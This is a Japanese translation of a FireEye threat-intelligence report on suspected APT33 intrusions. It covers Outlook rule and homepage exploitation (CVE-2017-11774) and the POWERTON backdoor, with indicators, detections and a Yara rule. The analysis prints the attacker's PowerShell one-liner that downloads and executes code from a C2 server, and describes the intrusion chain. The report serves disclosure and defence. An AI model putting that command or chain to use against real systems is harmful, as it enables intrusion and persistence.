却下: 潜在的に破壊的な敵対者の封じ込め

更新 (2019 年 7 月 3 日): 2019 年 5 月 16 日、FireEye の Advanced Practices チームは、残りの「疑わしい APT33 アクティビティ」(このブログ投稿では GroupB と呼ばれる) は、イラン政府の要請で動作している APT33 によるものであると特定しました。このブログ投稿のマルウェアとトレードクラフトは、 2019 年 6 月に米国連邦政府機関と金融、小売、メディア、教育セクターを標的とした侵入キャンペーンと一致しています。また、 2019 年 7 月に米国サイバー軍司令部が行った CVE-2017-11774 指標も同様です。 APT33 への属性。 FireEye がこのアクティビティをクラスタリングして属性を特定するための厳密なプロセスについては、このブログの「オーバーラップの特定」セクションでも説明しています。

序章

FireEye は、APT33 がエンジニアリング業界内での一連の侵入および侵入の試みの背後にある可能性があると評価しています。公開レポートは、このアクティビティが最近の破壊的な攻撃に関連している可能性があることを示しています。 FireEye のマネージド ディフェンスは、関連性があると当社が評価する多数の侵入に対応し、封じ込めてきました。攻撃者は、侵入の初期段階で公開されているツールを利用しています。ただし、検出を回避するために、後期のアクティビティでカスタム インプラントに移行することを確認しています。

2017 年 9 月 20 日、FireEye Intelligence は、エネルギーおよび航空宇宙産業を標的としたスピア フィッシング活動について詳述したブログ投稿を公開しました。最近の公開レポートでは、確認された APT33 スピア フィッシングと破壊的な SHAMOON 攻撃との間に関連がある可能性が示されました。ただし、この主張を独自に検証することはできませんでした。 FireEye の Advanced Practices チームは、テレメトリと積極的なプロアクティブ オペレーションを活用して、APT33 とその顧客に対する侵入の試みの可視性を維持しています。これらの取り組みにより、攻撃者が任務を完了する前に Managed Defense が特定して封じ込めた複数の侵入と一致する運用タイムラインを確立することができました。以下に説明する社内開発の類似性エンジンを使用して、侵入を関連付けました。さらに、公開討論では、私たちが観察した特定の攻撃者インフラストラクチャが最近の破壊的なSHAMOON攻撃に関連している可能性があることも示されています.

45 日前、24 時間 365 日の監視中に、 #ManagedDefenseは、新たに特定された敵のインフラストラクチャからの侵入の試みを検出し、封じ込めました*。

これは、POWERTON として追跡しているコード ファミリの C2 です。

*hxxps://103.236.149[.]100/api/info

— FireEye (@FireEye) 2018 年 12 月 15 日

脅威活動の重複を特定する

FireEye は、社内で開発された類似性エンジンを使用して専門知識を強化し、グループとアクティビティ間の潜在的な関連性と関係を評価します。このエンジンは、ドキュメント クラスタリングとトピック モデリングの文献からの概念を使用して、アクティビティ グループ間の類似性を計算して発見し、その後の分析のための調査の手がかりを作成するためのフレームワークを提供します。私たちのエンジンは、エンジニアリング業界内の一連の侵入の類似点を特定しました。ほぼリアルタイムの結果により、詳細な比較分析が行われました。 FireEye は、多数の侵入とすべての既知の APT33 活動から入手可能なすべての有機的情報を分析しました。その後、中程度の確信度で、2 つの特定の初期段階の侵入は 1 つのグループの仕業であると結論付けました。その後、Advanced Practices は、昨年観測された確認済みの APT33 活動に基づいて、運用スケジュールを再構築しました。それを封じ込められた侵入のタイムラインと比較し、特定の時間枠でのツールの選択に顕著な類似性を含む、状況的な重複があると判断しました。侵入が APT33 によって行われたものであるという信頼度は低いと評価しています。このブログにはオリジナルのソース資料のみが含まれていますが、すべてのソースの分析を含む完成したインテリジェンスは、インテリジェンス ポータルで入手できます。攻撃者が使用する手法を最もよく理解するには、24 時間年中無休の監視中に、この活動に対するマネージド ディフェンスの対応に関する背景情報を提供する必要があります。

Managed Defense Rapid Responses: 攻撃者の調査

2017 年 11 月中旬、マネージド ディフェンスは、エンジニアリング業界の顧客を標的とした脅威活動を特定し、対応しました。攻撃者は、盗んだ認証情報と公開ツールである SensePost のRULERを利用して、攻撃者が制御する WebDAV サーバー85.206.161[.]214@443outlookliveから悪意のあるペイロードをダウンロードして実行するように細工されたクライアント側のメール ルールを構成します。 .exe (MD5: 95f3bea43338addc1ad951cd2d42eb6f )。

ペイロードは、 hxxps://85.206.161[.]216:8080/HomePage.htmから追加の PowerShell を取得して実行する AutoIT ダウンローダーでした。 The follow-on PowerShell profiled the target system’s architecture, downloaded the appropriate variant of PowerSploit (MD5: c326f156657d1c41a9c387415bf779d4 or 0564706ec38d15e981f71eaf474d0ab8 ), and reflectively loaded PUPYRAT (MD5: 94cd86a0a4d747472c2b3f1bc3279d77 or 17587668AC577FCE0B278420B8EB72AC ).攻撃者は、公開されている CVE-2017-0213 のエクスプロイトを利用して権限をエスカレートし、公開されている Windows SysInternals PROCDUMP を利用して LSASS プロセスをダンプし、公開されている MIMIKATZ を利用して追加の資格情報を盗んだと思われます。 Managed Defense は、被害者が侵入を封じ込めるのを支援しました。

FireEye は、比較のために 168 の PUPYRAT サンプルを収集しました。インポート ハッシュ (IMPHASH) は特定には不十分ですが、指定されたサンプリングのうち、アクターの IMPHASH が 6 つのサンプルでのみ見つかったことは注目に値することがわかりました。これは APT33 によるものです。また、この期間中に APT33 が PowerShell EMPIRE から PUPYRAT に移行した可能性が高いと判断しました。

2018 年 7 月中旬、マネージド ディフェンスは、同じ業界に焦点を当てた同様の標的型脅威活動を特定しました。攻撃者は、盗んだ資格情報と、CVE-2017-11774 (RULER.HOMEPAGE) を悪用する RULER のモジュールを利用して、多数のユーザーの Outlook クライアント ホームページを改ざんし、コードを実行して永続化しました。これらの方法については、この投稿の「RULER In-The-Wild」セクションで詳しく説明します。

攻撃者は、この持続性メカニズムを利用して、公開されている .NET POSHC2 バックドアの OS 依存型の亜種と、新たに特定された PowerShell ベースのインプラントである POWERTON をダウンロードして実行しました。 Managed Defense は迅速に対応し、侵入を封じ込めることに成功しました。注目すべき点として、Advanced Practices は、APT33 が少なくとも 2018 年 7 月 2 日の時点で POSHC2 の使用を開始し、2018 年を通じてそれを使用し続けたことを別途確立しました。

7 月の活動中、Managed Defense は、 hxxp://91.235.116[.]212/index.htmlでホストされているホームページ エクスプロイトの 3 つのバリエーションを観察しました。一例を図 1 に示します。

 

攻撃者のホームページ エクスプロイト (CVE-2017-11774)

図 1: 攻撃者のホームページのエクスプロイト (CVE-2017-11774)

各エクスプロイト内の主なエンコードされたペイロードは、適切な OS 依存の POSHC2 インプラントを決定するために WMIC を利用してシステム プロファイリングを実行し、ユーザーの%LOCALAPPDATA%ディレクトリ ( %LOCALAPPDATA%MediaWs Media.ps1 ) を図 2 に示します。

 

攻撃者の「Media.ps1」スクリプト

図 2: 攻撃者の「Media.ps1」スクリプト

Media.ps1 」の目的は、ダウンロードされたバイナリ ペイロードをデコードして実行することでした。これは「 C:UsersPublicDownloadslog.dat 」としてディスクに書き込まれました。後の段階で、この PowerShell スクリプトは、レジストリの実行キーを介してホスト上で持続するように構成されます。

log.dat 」ペイロードを分析した結果、ハードコードされたコマンド アンド コントロール (C2) アドレスから PowerShell ペイロードをダウンロードして実行するように記述された、公開されている POSHC2 プロキシ対応ステージャーの亜種であることが判明しました。これらの特定の POSHC2 サンプルは、.NET フレームワークで実行され、Base64 でエンコードされた文字列からペイロードを動的に読み込みます。インプラントは、HTTP 経由で偵察レポートを C2 サーバー ( hxxps://51.254.71[.]223/images/static/content/ ) に送信し、その後、その応答を PowerShell ソース コードとして評価します。偵察レポートには、次の情報が含まれています。

  • ユーザー名とドメイン
  • コンピュータネーム
  • CPUの詳細
  • 現在のexe PID
  • 構成済みの C2 サーバー

C2 メッセージは、ハードコードされたキーを使用して AES 経由で暗号化され、Base64 でエンコードされます。前述の「 Media.ps1 」PowerShell スクリプトの永続性を確立したのは、この POSHC2 バイナリであり、システムの起動時に POSHC2 バイナリをデコードして実行します。確認された 2018 年 7 月の活動中に、POSHC2 亜種は 2018 年 7 月 29 日のキル日で設定されました。

POSHC2 は、POWERTON という名前の新しい PowerShell ベースのインプラント ( hxxps://185.161.209[.]172/api/info ) をダウンロードして実行するために利用されました。この間、攻撃者は POWERTON とのやり取りに限定的な成功を収めました。攻撃者は、「 CloudPackage.exe 」(MD5: 46038aa5b21b940099b0db413fa62687) という名前の AutoIt バイナリをダウンロードして永続化することができました。これは、POWERTON の「persist」コマンドによって達成されました。 「 CloudPackage.exe 」の唯一の機能は、PowerShell コードの次の行を実行することでした。

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; $webclient = 新しいオブジェクト System.Net.WebClient; $webclient.Credentials = new-object System.Net.NetworkCredential(‘public’, ‘fN^4zJp{5w#K0VUm}Z_a!QXr*]&2j8Ye’); iex $webclient.DownloadString(‘hxxps://185.161.209[.]172/api/default’)

このコードの目的は、C2 サーバーから「サイレント モード」の POWERTON を取得することです。攻撃者は、強力な認証情報を使用して後続のペイロードを保護していたことに注意してください。この直後、Managed Defense が侵入を封じ込めました。

約 3 週間後、攻撃者はパスワード スプレーを成功させてアクセスを再確立しました。 Managed Defense は、RULER を使用して悪意のあるホームページを展開し、ワークステーションに永続化するアクターを即座に特定しました。彼らは、検出を回避するために、いくつかのインフラストラクチャとツールに変更を加え、難読化のレイヤーを追加しました。攻撃者は、新しい C2 サーバー ( hxxp://5.79.66[.]241/index.html ) でホームページのエクスプロイトをホストしました。この期間中に、「 index.html 」の少なくとも 3 つの新しいバリエーションが特定されました。これらの亜種のうち 2 つには、.NET POSHC2 バイナリの新しい OS 依存亜種をダウンロードするために記述された、エンコードされた PowerShell コードが含まれていました (図 3 参照)。

 

OS 固有の POSHC2 ダウンローダー

図 3: OS 固有の POSHC2 ダウンローダー

図 3 は、PowerShell の「 DownloadString 」コマンドをエンコードし、結果としてディスクにドロップされた POSHC2 および .ps1 ファイルの名前を変更するなど、攻撃者がいくつかの小さな変更を加えたことを示しています。デコードされると、コマンドはさらに別の新しい C2 サーバー ( hxxp://103.236.149[.]124/delivered.dat ) から POSHC2 バイナリをダウンロードしようとします。 POSHC2 亜種をデコードして実行するために投下された .ps1 ファイルの名前も「 Vision.ps1 」に変更されました。この 2018 年 8 月の活動中、POSHC2 の亜種は 2018 年 8 月 13 日の「kill date」で設定されました。

ここでも、POSHC2 を使用して、C2 ドメインhxxps://basepack[.]orgと通信するように構成された POWERTON の新しい亜種 (MD5: c38069d0bc79acdc28af3820c1123e53 ) がダウンロードされました。 8 月下旬のある時点で、POSHC2 のキル日の後、攻撃者は RULER.HOMEPAGE を使用して POWERTON を直接ダウンロードし、以前に観察された中間段階をバイパスしました。

Managed Defense がこれらの侵入を早期に封じ込めたため、攻撃者の動機を確認できませんでした。しかし、彼らが被害者のネットワークへのアクセスを取得して維持することに固執していたことは明らかでした。

攻撃者の追跡: インフラストラクチャの監視

Advanced Practices は、攻撃者のインフラストラクチャを大規模に特定して監視するために、積極的なプロアクティブな運用を実施します。攻撃者は、2018 年 7 月 16 日から 10 月 11 日までの間、 hxxp://91.235.116[.]212/index.htmlで RULER.HOMEPAGE ペイロードを維持していました。少なくとも 2018 年 10 月 11 日に、攻撃者はペイロードを変更しました (MD5 : 8be06571e915ae3f76901d52068e3498 ) hxxps://103.236.149[.]100/api/infoから POWERTON サンプルをダウンロードして実行します。 (MD5: 4047e238bbcec147f8b97d849ef40ce5 )。この特定の URL は、公開討論で、最近の破壊的な攻撃に関連している可能性があると特定されました。この相関関係を、私たちが所有する有機情報と独自に検証することはできません。

2018 年 12 月 13 日、Advanced Practices は、 hxxp://89.45.35[.]235/index.html (MD5: f0fe6e9dde998907af76d91ba8f68a05 ) でホストされている悪意のある RULER.HOMEPAGE ペイロードを積極的に特定し、特定しました。ペイロードは、 hxxps://staffmusic[.]org/transfer/view (MD5: 53ae59ed03fa5df3bf738bc0775a91d9 ) でホストされている POWERTON をダウンロードして実行するように作成されました。

表 1 に、分析した活動の運用スケジュールを示します。

日付/時刻 (UTC)

ノート

インジケータ

2017-08-15 17:06:59

APT33 – 帝国 (中古)

8a99624d224ab3378598b9895660c890

2017-09-15 16:49:59

APT33 – PUPYRAT (コンパイル済み)

4b19bccc25750f49c2c1bb462509f84e

2017-11-12 20:42:43

GroupA – AUT2EXE ダウンローダー (コンパイル済み)

95f3bea43338addc1ad951cd2d42eb6f

2017-11-14 14:55:14

グループA – PUPYRAT (中古)

17587668ac577fce0b278420b8eb72ac

2018-01-09 19:15:16

APT33 – PUPYRAT (コンパイル済み)

56f5891f065494fdbb2693cfc9bce9ae

2018-02-13 13:35:06

APT33 – PUPYRAT (中古)

56f5891f065494fdbb2693cfc9bce9ae

2018-05-09 18:28:43

グループ B – AUT2EXE (コンパイル済み)

46038aa5b21b940099b0db413fa62687

2018-07-02 07:57:40

APT33 – POSHC2 (中古)

fa7790abe9ee40556fb3c5524388de0b

2018-07-16 00:33:01

グループ B – POSHC2 (コンパイル済み)

75e680d5fddbdb989812c7ba83e7c425

2018-07-16 01:39:58

グループB – POSHC2 (中古)

75e680d5fddbdb989812c7ba83e7c425

2018-07-16 08:36:13

GroupB – POWERTON (中古)

46038aa5b21b940099b0db413fa62687

2018-07-31 22:09:25

APT33 – POSHC2 (中古)

129c296c363b6d9da0102aa03878ca7f

2018-08-06 16:27:05

グループ B – POSHC2 (コンパイル済み)

fca0ad319bf8e63431eb468603d50eff

2018-08-07 05:10:05

グループB – POSHC2 (中古)

75e680d5fddbdb989812c7ba83e7c425

2018-08-29 18:14:18

APT33 – POSHC2 (中古)

5832f708fd860c88cbdc088acecec4ea

2018-10-09 16:02:55

APT33 – POSHC2 (中古)

8d3fe1973183e1d3b0dbec31be8ee9dd

2018-10-09 16:48:09

APT33 – POSHC2 (中古)

48d1ed9870ed40c224e50a11bf3523f8

2018-10-11 21:29:22

GroupB – POWERTON (中古)

8be06571e915ae3f76901d52068e3498

2018-12-13 11:00:00

グループB – POWERTON (特定)

99649d58c0d502b2dfada02124b1504c

表 1: 運用タイムライン

展望と影響

これらの侵入中に観察された活動が APT33 に関連している場合、APT33 は、Managed Defense からの持続的な圧力によって使用が強制されるまで、以前は観察されていなかった独自の機能を維持していた可能性が高いことを示唆しています。 FireEye Intelligence は以前、APT33 が破壊的なマルウェアと関係があり、重要なインフラストラクチャに高いリスクをもたらすことを報告しています。このリスクはエネルギー部門で顕著であり、私たちは一貫して彼らがターゲットとしていると観察しています。その標的は、特に石油化学製品の生産に関連して、経済成長と競争上の優位性のためのイランの国家的優先事項と一致しています。

これらのクラスターが同じであるという高い信頼が得られるまで、これらのクラスターを個別に追跡し続けます。説明されている各侵入の背後にいるオペレーターは、必要に応じて独自のインプラントに加えて、公開されているが広く理解されていないツールや技術を使用しています。マネージド ディフェンスには、さまざまな業界や敵対者の侵入活動に毎日さらされるという特権があります。この日々の最前線での経験は、Advanced Practices、FireEye Labs Advanced Reverse Engineering (FLARE)、および FireEye Intelligence によって支えられており、巧妙な攻撃者に対してクライアントが持つことができるあらゆる利点を提供します。帰属に関する分析的判断を確認または反論するために評価できる追加の元のソース情報を歓迎します。

カスタム バックドア: POWERTON

POWERTON は PowerShell で記述されたバックドアです。 FireEye は、同様のコード ベースで公開されているツールセットをまだ特定しておらず、カスタム ビルドである可能性が高いことを示しています。 POWERTON は、 WMIや自動実行レジストリ キーなど、複数の永続化メカニズムをサポートするように設計されています。 C2 との通信は TCP/HTTP(S) を介して行われ、C2 との間の通信トラフィックには AES 暗号化が利用されます。 POWERTON は通常、後期段階のバックドアとして展開され、複数のレイヤーで難読化されています。

FireEye は、POWERTON.v1 と POWERTON.v2 として別々に追跡された POWERTON の少なくとも 2 つの異なるバージョンを確認しており、後者はコマンド アンド コントロール機能を改善し、パスワード ハッシュをダンプする機能を統合しています。

表 2 には、POWERTON のサンプルが含まれています。

難読化されたファイルのハッシュ (MD5)

難読化解除されたファイルのハッシュ (MD5)

バージョン

974b999186ff434bee3ab6d61411731f

3871aac486ba79215f2155f32d581dc2

V1

e2d60bb6e3e67591e13b6a8178d89736

2cd286711151efb61a15e2e11736d7d2

V1

bd80fcf5e70a0677ba94b3f7c011440e

5a66480e100d4f14e12fceb60e91371d

V1

4047e238bbcec147f8b97d849ef40ce5

f5ac89d406e698e169ba34fea59a780e

V2

c38069d0bc79acdc28af3820c1123e53

4aca006b9afe85b1f11314b39ee270f7

V2

なし

7f4f7e307a11f121d8659ca98bc8ba56

V2

53ae59ed03fa5df3bf738bc0775a91d9

99649d58c0d502b2dfada02124b1504c

V2

表 2: POWERTON マルウェアのサンプル

攻撃者の手口: 電子メールの悪用の増加

Outlook と Exchange は、電子メール アクセスの概念を備えたユビキタスです。ユーザーの利便性は、技術の進歩を後押しする主な要因ですが、ユーザーにとって便利なアクセスは、多くの場合、敵対者にとって追加の攻撃面を明らかにします。組織が電子メール サーバー アクセスをパブリック インターネットに公開すると、それらのシステムが侵入ベクトルになります。 FireEye は、Exchange および Office365 のセキュリティ制御に異議を唱え、破壊する標的型攻撃者の増加を観察しています。また、Mandiant のコンサルタントは、FireEye Cyber Defense Summit 2018 で、敵対者が多要素認証を覆すために使用するいくつかの新しい方法を紹介しました。

FireEye では、意思決定はデータに基づいて行われますが、提供されるデータは不完全であることが多く、侵入に効果的に対応するには、専門知識に基づいて欠けている部分を推測する必要があります。このベクトルの悪用のもっともらしいシナリオは次のとおりです。

敵対者は、次の非網羅的な例を含むために、組織内のユーザーの有効な資格情報の 1 組を何らかの手段で取得します。

  • ユーザーが資格情報を再利用したサードパーティの違反。あなたの会社は、first.last@yourorganization.tld などの電子メール アドレスの命名基準を利用していますか?組織内のユーザーが、どこかでサード パーティによる侵害で侵害された姓名と関連パスワードを持つ個人の電子メール アドレスを持っている可能性があります。彼らはそのパスワードを再利用しましたか?
  • 資格情報が侵害されたが、識別またはリセットされなかった組織内の以前の侵害。
  • パスワードの選択やパスワード セキュリティ ポリシーが不十分で、認証情報がブルート フォースされます。
  • ユーザーからのフィッシングを目的としたドキュメントを介して収集された NTLM ハッシュなど、他のさまざまなソースからクラック可能なパスワード ハッシュを収集します。
  • 収集された資格情報が販売、再利用、またはインターネット上の別の場所で恒久的に文書化される可能性がある資格情報収集フィッシング詐欺。

攻撃者は、正当な資格情報を取得すると、多要素認証で保護されていない、一般にアクセス可能な Outlook Web Access (OWA) または Office 365 を特定します。攻撃者は、盗んだ資格情報と RULER のようなツールを利用して、Exchange の正当な機能を介してエクスプロイトを配信します。

RULER In-The Wild: ここ、あちら、どこでも

SensePost の RULER は、HTTP プロトコルを介してメッセージング アプリケーション プログラミング インターフェイス (MAPI) またはリモート プロシージャ コール (RPC) を介して Exchange サーバーと対話するように設計されたツールです。 「Managed Defense Rapid Responses」セクションで詳しく説明されているように、2017 年 11 月中旬、FireEye は単一ホスト上の既存の Outlook 電子メール クライアント プロセスによって生成されたネットワーク アクティビティを目撃しました。制御された IP アドレス85.206.161[.]214。この通信は、 Aut2Exe (MD5: 95f3bea43338addc1ad951cd2d42eb6f)で作成された実行可能ファイルを取得し、PowerShell ワンライナーを実行してさらに悪意のあるコンテンツを取得しました。

影響を受けたメールボックスからの必要なログがなくても、次の理由から、このアクティビティが前述のツールを使用して作成された悪意のあるメール ルールの結果であると評価できます。

  • Outlook.exe は、攻撃者の IP アドレスでホストされている悪意のある実行可能ファイルを WebDAV 経由で直接要求しました。 Outlook の何らかの機能が直接悪用されない限り、これは予期しないことです。フィッシングのような従来のベクトルは、Outlook が Office 製品、Acrobat、または同様のものの子プロセスを生成したプロセスの祖先を示します。プロセス インジェクションは、ホスト上で以前に悪意のあるコードが実行されたことを意味しますが、証拠はこれをサポートしていません。
  • 95f3bea43338addc1ad951cd2d42eb6fの転送は WebDAV 経由でした。 RULER は、単純な WebDAV サーバーと、そのWebDAV がホストするペイロードを指すクライアント側のメール ルールを作成するためのコマンド ライン モジュールを公開することで、これを容易にします。
  • このステージャーの最初の転送に WebDAV を選択したのは、メール ルールの作成における制限の結果です。つまり、HTTP や FTP などのプロトコル ハンドラは許可されません。これは、RULER が作成される前の Silent Break Security の最初の記事で詳しく説明されています。これにより、UNC ファイル パス経由の SMB および WebDAV が、Outlook ルール経由で悪意のあるペイロードを転送するための利用可能なオプションとして残ります。 WebDAV は、ネットワークの観点からはアラートが少ないオプションである可能性があります。これは、SMB を介してドメインに参加していないホストと通信しているドメインに参加しているホストを見つけるよりも、インターネットへのポート 80 および 443 を介して WebDAV トランザクションが発生している可能性が高いためです。任意の IP アドレス。
  • Outlook のクライアント側のメール ルールを介して実行されるペイロードには、引数が含まれていてはなりません。これが、コンパイル済みの Aut2exe 実行可能ファイルが選択された理由である可能性があります。 95f3bea43338addc1ad951cd2d42eb6fは、PowerShell ワンライナーを実行して、追加の悪意のあるコンテンツを取得して実行するだけです。ただし、この制限により、Outlook ルールをネイティブに使用してこのコマンドを実行することはできませんでした。

これを念頭に置いて、最初の感染経路を図 4 に示します。

 

初期感染ベクター

図 4: 初期の感染経路

攻撃者と防御者の両方が電子メール セキュリティの調査を続けているため、一般に公開されている手法とエクスプロイトが急速に採用されています。 SensePost によるCVE-2017-11774 の特定と責任ある開示も例外ではありませんでした。攻撃者の観点から見た、Outlook のホーム ページをシェルと永続化のために悪用する方法についての優れた説明については、SensePost のブログ を参照してください

FireEye は、悪意のある攻撃者によるこの特定のホームページ エクスプロイト手法の使用の増加を観察し、文書化しました。私たちの経験に基づくと、この特定の方法は、防御側がアーティファクトを誤解し、誤った軽減策に焦点を合わせているため、より成功する可能性があります.一部の防御者は、CVE-2017-11774 のエクスプロイトの成功を最初に知る可能性があるため、Outlook のスポーン プロセスを観察して、悪意のあるコードが実行される可能性があります。この観察結果が、悪意のある HTML アプリケーション (.hta) の添付ファイルに似ている可能性があるスタンドアロンのフォレンジック アーティファクトと組み合わされると、証拠がフィッシング メールによる最初の感染と誤解される可能性があります。この誤った仮定は、攻撃者が CVE-2017-11774 を展開するために有効な資格情報を必要とするという事実を見落としているため、侵害の範囲は、ホームページの永続性が発見された個々のユーザーの Outlook クライアントよりも大きい可能性があります。防御者を支援するために、この投稿の最後に、これらの Outlook ホームページ ペイロードを区別する Yara ルールを含めます。

このニュアンスを理解することで、この攻撃者が文書化したパスワード スプレーと組み合わせると、この手法にさらされる可能性がさらに浮き彫りになり、多要素認証やパッチ管理など、多層化された電子メール セキュリティ防御の重要性が強調されます。組織は、電子メールの攻撃面を可能な限り減らすことをお勧めします。クラウド サービス プロバイダーで電子メールをホストすることを選択した組織は、そのサーバーへのアクセスに使用されるソフトウェア クライアントにパッチが適用されていることを確認する必要があります。 Outlook 365/Exchange アクセスに多要素認証を実装するだけでなく、表 3 の Microsoft セキュリティ更新プログラムは、SensePost の RULER などのツールキットによる悪用にさらされている既知および文書化された攻撃ベクトルを軽減するのに役立ちます。

Microsoft Outlook セキュリティ更新プログラム

RULER モジュールのアドレス指定

2017 年 6 月 13 日セキュリティ更新プログラム

RULER.RULES

2017 年 9 月 12 日のセキュリティ更新プログラム

RULER.FORMS

2017 年 10 月 10 日のセキュリティ更新プログラム

RULER.HOMEPAGE

表 3: Outlook の攻撃面の軽減策

テクニックの検出

FireEye は、POSHC2、PUPYRAT、および POWERTON の名前付き検出を含む、プラットフォーム全体でこのアクティビティを検出しました。表 4 には、電子メールの悪用と初期の感染活動に適用された特定の検出名がいくつか含まれています。

プラットホーム

署名名

エンドポイント セキュリティ

PowerShell でエンコードされたリモート ダウンロード (方法論)
疑わしい PowerShell の使用法 (方法論)
MIMIKATZ (CREDENTIAL STEALER)
RULER OUTLOOK 永続性 (ユーティリティ)

ネットワークと電子メールのセキュリティ

FE_Exploit_HTML_CVE201711774
FE_HackTool_Win_RULER
FE_HackTool_Linux_RULER
FE_HackTool_OSX_RULER
FE_Trojan_OLE_RULER
HackTool.RULER (ネットワーク トラフィック)

表 4: FireEye 製品の検出

Outlook ホームページのシェルと永続性を探している組織のために、これらのペイロードを他のスクリプトと区別するコンテキストにも使用できる Yara ルールを含めました。

ルール Hunting_Outlook_Homepage_Shell_and_Persistence
{
メタ:
author = “ニック・カー (@itsreallynick)”
reference_hash = “506fe019d48ff23fac8ae3b6dd754f6e”
文字列:
$script_1 = “<htm” ascii nocase wide
$script_2 = “<script” ascii nocase wide
$viewctl1_a = “ViewCtl1” ascii nocase wide
$viewctl1_b = “0006F063-0000-0000-C000-000000000046” ASCII ワイド
$viewctl1_c = “.OutlookApplication” ascii nocase wide
調子:
uint16(0) != 0x5A4D および ($script*) のすべておよび ($viewctl1*) のいずれか
}

謝辞

著者は、アトリビューション拡張プロジェクトにデータ サイエンス サポートを提供してくれた Matt Berninger、リバース エンジニアリング POWERTON に協力してくれた Omar Sardar (FLARE)、および包括的な Outlook クライアント エクスプロイト製品を継続的にカバーしてくれた Joseph Reyes (FireEye Labs) に感謝します。

参照: https://www.mandiant.com/resources/blog/overruled-containing-a-potentially-destructive-adversary

Comments

タイトルとURLをコピーしました